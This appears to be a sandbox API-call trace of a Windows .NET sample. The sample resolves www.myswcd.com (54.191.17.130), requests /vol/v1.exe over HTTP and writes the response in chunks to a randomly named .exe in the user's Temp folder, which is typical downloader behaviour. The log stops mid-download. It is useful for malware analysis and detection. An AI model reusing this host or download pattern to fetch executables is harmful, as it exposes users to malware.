Mutex Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Mutex Create mutex_name = Global\.net clr networking True 1
Fn
Mutex Release mutex_name = Global\.net clr networking True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Socket Create protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM True 1
Fn
DNS Resolve Name host = www.myswcd.com, address_out = 54.191.17.130 True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM True 1
Fn
Socket Create protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM True 1
Fn
Socket Connect remote_address = 54.191.17.130, remote_port = 80 True 1
Fn
Socket Close type = SOCK_STREAM True 1
Fn
Socket Send flags = NO_FLAG_SET, size = 74, size_out = 74 True 1
Fn
Data
Inet Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Fn
Inet Open Connection protocol = http, server_name = www.myswcd.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /vol/v1.exe True 1
Fn
Inet Send HTTP Request headers = host: www.myswcd.com, connection: Keep-Alive, url = www.myswcd.com/vol/v1.exe True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 4096, size_out = 4096 True 1
Fn
Data
Inet Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 4664 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 4664 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4333 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1624 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1624 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 63064 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 33744 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 33744 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 33744 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 5840 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 5840 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 5840 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 33744 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 33744 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 33744 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 32120 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 32120 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 32120 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 24984 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 24984 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 24984 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 17684 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 17684 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 17684 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 39420 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 39420 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 39420 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 20604 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 20604 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 20604 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 54184 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 54184 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 54184 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 24984 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 24984 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 24984 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 61484 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 61484 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 61484 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 7464 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 7464 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 7464 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 57432 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 57432 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 57432 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 23524 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 23524 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 23524 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 3752 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 3752 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65192 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 2580 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 2580 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 64020 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 164 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 164 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 61604 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 38452 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 38452 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 38452 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 344 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 344 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 61784 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 25148 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 25148 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 25148 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 3752 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 3752 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 18148 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 18148 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 17804 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 7464 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 7464 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 7464 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 25148 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 25148 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 25148 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 3752 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 3752 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 628 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 628 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 61724 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 26444 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 26444 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 26444 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 32448 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 32448 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 32448 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 29364 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 29364 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 29364 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 36828 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 36828 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 36828 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 6004 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 6004 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 6004 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 492 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 492 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 61932 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 7464 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 7464 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 7464 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1624 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1624 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 63064 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 49804 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 49804 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 49804 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 7464 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 7464 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 7464 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 1624 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 1624 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 63064 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 62944 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 62944 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 62944 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 14600 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 14600 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 14600 True 1
Fn
Data
Socket Receive flags = NO_FLAG_SET, size = 65536, size_out = 65536 True 1
Fn
Data
Inet Read Response size = 65536, size_out = 65536 True 1
Fn
Data
